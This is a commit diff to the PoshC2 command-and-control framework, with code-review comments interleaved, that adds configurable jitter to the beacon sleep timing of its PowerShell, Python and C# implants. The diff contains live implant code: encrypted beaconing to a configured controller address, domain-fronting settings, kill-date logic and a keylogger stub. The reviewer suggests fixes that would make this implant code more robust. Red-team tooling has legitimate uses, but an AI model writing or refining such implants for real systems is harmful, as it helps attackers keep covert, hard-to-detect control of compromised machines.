Add configurable jitter to all implants
parent
76537b8d48
commit
2ecd16a4e4
|
@ -9,6 +9,7 @@ ROOTDIR = "/opt/PoshC2_Project/"
|
|||
HostnameIP = "https://192.168.233.1"
|
||||
DomainFrontHeader = "" # example df.azureedge.net
|
||||
DefaultSleep = "5s"
|
||||
Jitter = 0.20
|
||||
KillDate = "08/06/2019"
|
||||
UserAgent = "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
|
||||
urlConfig = UrlConfig("%soldurls.txt" % POSHDIR) # Instantiate UrlConfig object - old urls using a list from a text file
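Review bot: The new `Jitter = 0.20` setting has no comment saying what the number means or which values are valid, unlike the `DomainFrontHeader` line above it. The templates changed in this commit use it as a fraction of the sleep interval (`timer * (1 - jitter)` to `timer * (1 + jitter)`), so a value of 1 or more makes the lower bound zero or negative. I would add a trailing comment such as `# fraction of DefaultSleep applied as +/- variation; must be >= 0 and < 1`. The file name is not shown on the page; this is presumably the module that `Implant.py` imports as `Config`.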
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
$key="%s"
|
||||
$jitter=%s
|
||||
Function Beacon($sleeptime) {
|
||||
if ($sleeptime.ToLower().Contains('m')) {
|
||||
$sleeptime = $sleeptime -replace 'm', ''
|
||||
|
@ -119,17 +120,17 @@ function Encrypt-String($key, $unencryptedString) {
|
|||
[System.Convert]::ToBase64String($fullData)
|
||||
}
|
||||
function Encrypt-Bytes($key, $bytes) {
|
||||
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
|
||||
$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
|
||||
$gzipStream.Write( $bytes, 0, $bytes.Length )
|
||||
$gzipStream.Close()
|
||||
$bytes = $output.ToArray()
|
||||
$output.Close()
|
||||
$aesManaged = Create-AesManagedObject $key
|
||||
$encryptor = $aesManaged.CreateEncryptor()
|
||||
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
|
||||
[byte[]] $fullData = $aesManaged.IV + $encryptedData
|
||||
$fullData
|
||||
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
|
||||
$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
|
||||
$gzipStream.Write( $bytes, 0, $bytes.Length )
|
||||
$gzipStream.Close()
|
||||
$bytes = $output.ToArray()
|
||||
$output.Close()
|
||||
$aesManaged = Create-AesManagedObject $key
|
||||
$encryptor = $aesManaged.CreateEncryptor()
|
||||
$encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
|
||||
[byte[]] $fullData = $aesManaged.IV + $encryptedData
|
||||
$fullData
|
||||
}
|
||||
function Decrypt-String($key, $encryptedStringWithIV) {
|
||||
$bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
|
||||
|
@ -188,7 +189,7 @@ while($true)
|
|||
$date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null)
|
||||
$killdate = [datetime]::ParseExact("%s","dd/MM/yyyy",$null)
|
||||
if ($killdate -lt $date) {exit}
|
||||
$sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
|
||||
$sleeptimeran = $sleeptime, ($sleeptime * (1 + $Jitter)), ($sleeptime * (1 - $Jitter))
|
||||
$newsleep = $sleeptimeran|get-random
|
||||
if ($newsleep -lt 1) {$newsleep = 5}
|
||||
start-sleep $newsleep
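Review bot: The variable is declared as `$jitter=%s` at the top of the template but read as `$Jitter` in the sleep loop at the end of this section; PowerShell variable names are case-insensitive so it resolves, but one spelling should be used throughout. The `Encrypt-Bytes` hunk appears to be a whitespace-only re-indentation, since the body is shown twice with identical text, and it would be easier to review as a separate commit from the jitter change. The `while($true)` loop starts and ends outside the hunk, so the type of `$sleeptime` at this point cannot be confirmed from the page.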
|
||||
|
|
|
@ -15,6 +15,7 @@ urls = [%s]
|
|||
kd=time.strptime("%s","%%d/%%m/%%Y")
|
||||
useragent = ""
|
||||
imbase = "%s"
|
||||
jitter = %s
|
||||
|
||||
def keylog():
|
||||
# keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py
|
||||
|
@ -96,7 +97,8 @@ while(True):
|
|||
uri = "%s"
|
||||
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
|
||||
try:
|
||||
time.sleep(timer)
|
||||
this_timer = random.randint(timer * (1 - jitter), timer * (1 + jitter))
|
||||
time.sleep(this_timer)
|
||||
ua='%s'
|
||||
if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua})
|
||||
else: req=urllib2.Request(server,headers={'User-agent':ua})
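Review bot: `random.randint(timer * (1 - jitter), timer * (1 + jitter))` passes float bounds to `randint`, which raises `ValueError` when a bound is not a whole number, for example a 7-second timer with `jitter = 0.2`. It works for the defaults only because 5 * 0.8 and 5 * 1.2 happen to be integral. Casting the bounds keeps the integer-second behaviour: `this_timer = random.randint(int(timer * (1 - jitter)), int(timer * (1 + jitter)))`. The call sits inside a `try:` whose handler is outside the hunk, so whether the error is swallowed or propagates cannot be seen here; `timer` is also defined outside the hunk and is assumed to be numeric.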
|
||||
|
|
|
@ -210,6 +210,10 @@ public class Program
|
|||
m = re.Match(x);
|
||||
var Sleep = m.Groups[1].ToString();
|
||||
|
||||
re = new Regex("JITTER2025(.*)5202RETTIJ");
|
||||
m = re.Match(x);
|
||||
var Jitter = m.Groups[1].ToString();
|
||||
|
||||
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
|
||||
m = re.Match(x);
|
||||
var NewKey = m.Groups[1].ToString();
|
||||
|
@ -218,7 +222,7 @@ public class Program
|
|||
m = re.Match(x);
|
||||
var IMGs = m.Groups[1].ToString();
|
||||
|
||||
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
|
||||
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs, Jitter);
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -365,7 +369,7 @@ public class Program
|
|||
}
|
||||
}
|
||||
|
||||
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
|
||||
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS, string Jitter)
|
||||
{
|
||||
UrlGen.Init(stringURLS, RandomURI, baseURL);
|
||||
ImgGen.Init(stringIMGS);
|
||||
|
@ -381,7 +385,7 @@ public class Program
|
|||
Console.SetOut(strOutput);
|
||||
var exitvt = new ManualResetEvent(false);
|
||||
var output = new StringBuilder();
|
||||
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
|
||||
while (!exitvt.WaitOne((int)(new Random().Next((int)(beacontime * 1000 * (1F - Double.Parse(Jitter))), (int)(beacontime * 1000 * (1F + Double.Parse(Jitter)))))))
|
||||
{
|
||||
if (Convert.ToDateTime(KillDate) < DateTime.Now)
|
||||
{
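Review bot: `Double.Parse(Jitter)` in the `WaitOne` loop condition uses the current thread culture, so the generated string `0.20` is read differently on hosts whose culture uses a comma as the decimal separator. An empty capture from the `JITTER2025(.*)5202RETTIJ` regex would also throw `FormatException`. The value is parsed twice and a new `Random` is constructed each time the loop condition is evaluated. I would parse once before the loop with `double jitter = Double.Parse(Jitter, System.Globalization.CultureInfo.InvariantCulture);`, check that it lies between 0 and 1, and reuse a single `Random` instance. `ImplantCore` continues outside the hunk, so `beacontime` and any existing error handling are not visible here.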
|
||||
|
|
12
Implant.py
12
Implant.py
|
@ -2,7 +2,7 @@
|
|||
|
||||
from Colours import Colours
|
||||
from Utils import randomuri, gen_key
|
||||
from Config import PayloadsDirectory, FilesDirectory
|
||||
from Config import PayloadsDirectory, FilesDirectory, Jitter
|
||||
from DB import select_item, get_defaultbeacon, get_killdate, get_dfheader, get_otherbeaconurls, get_defaultuseragent, new_implant, new_task, update_mods, get_autoruns
|
||||
from Core import get_images
|
||||
|
||||
|
@ -28,6 +28,7 @@ class Implant(object):
|
|||
self.UserAgent = get_defaultuseragent()
|
||||
self.Sleep = get_defaultbeacon()
|
||||
self.ModsLoaded = ""
|
||||
self.Jitter = Jitter
|
||||
self.ImplantID = ""
|
||||
self.Pivot = pivot
|
||||
self.KillDate = get_killdate()
|
||||
|
@ -39,16 +40,17 @@ RANDOMURI19901%s10991IRUMODNAR
|
|||
URLS10484390243%s34209348401SLRU
|
||||
KILLDATE1665%s5661ETADLLIK
|
||||
SLEEP98001%s10089PEELS
|
||||
JITTER2025%s5202RETTIJ
|
||||
NEWKEY8839394%s4939388YEKWEN
|
||||
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
|
||||
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Jitter, self.Key, self.AllBeaconImages)
|
||||
with open("%spy_dropper.sh" % (PayloadsDirectory), 'rb') as f:
|
||||
self.PythonImplant = base64.b64encode(f.read())
|
||||
py_implant_core = open("%s/Implant-Core.py" % FilesDirectory, 'r').read()
|
||||
self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent)
|
||||
self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Jitter, self.Key, self.RandomURI, self.UserAgent)
|
||||
ps_implant_core = open("%s/Implant-Core.ps1" % FilesDirectory, 'r').read()
|
||||
self.PSCore = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs)
|
||||
#Add all db elements
|
||||
self.PSCore = ps_implant_core % (self.Key, self.Jitter, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) #Add all db elements def display(self):
|
||||
|
||||
#Add all db elements
|
||||
def display(self):
|
||||
print Colours.GREEN,""
|
||||
it = self.Pivot
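Review bot: `self.Jitter = Jitter` takes the value straight from the Config import, and the three `%` format calls then write it unquoted into generated source (`jitter = %s`, `$jitter=%s`, `JITTER2025%s5202RETTIJ`) with no check that it is a number in a sensible range. Converting and validating once in the constructor keeps a mistyped config value from producing broken template output, e.g. `self.Jitter = float(Jitter)` followed by `if not 0 <= self.Jitter < 1: raise ValueError("Jitter must be in [0, 1)")`. It also differs from the neighbouring defaults, which are read through DB helpers (`get_defaultbeacon()`, `get_killdate()`); if that is intentional, a short comment saying so would help. The constructor and the code that fills the templates both extend beyond the hunks shown.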
|
||||
|
|
|
@ -10,6 +10,7 @@ Add ability to upload a file to an ADS
|
|||
Update BloodHound
|
||||
Pull out unpatched payloads into file for easy management
|
||||
Add base64 encoded versions of the shellcode to the payloads directory
|
||||
Add a configurable jitter to all implants
|
||||
|
||||
4.8 (13/02/19)
|
||||
==============
|
||||
|
|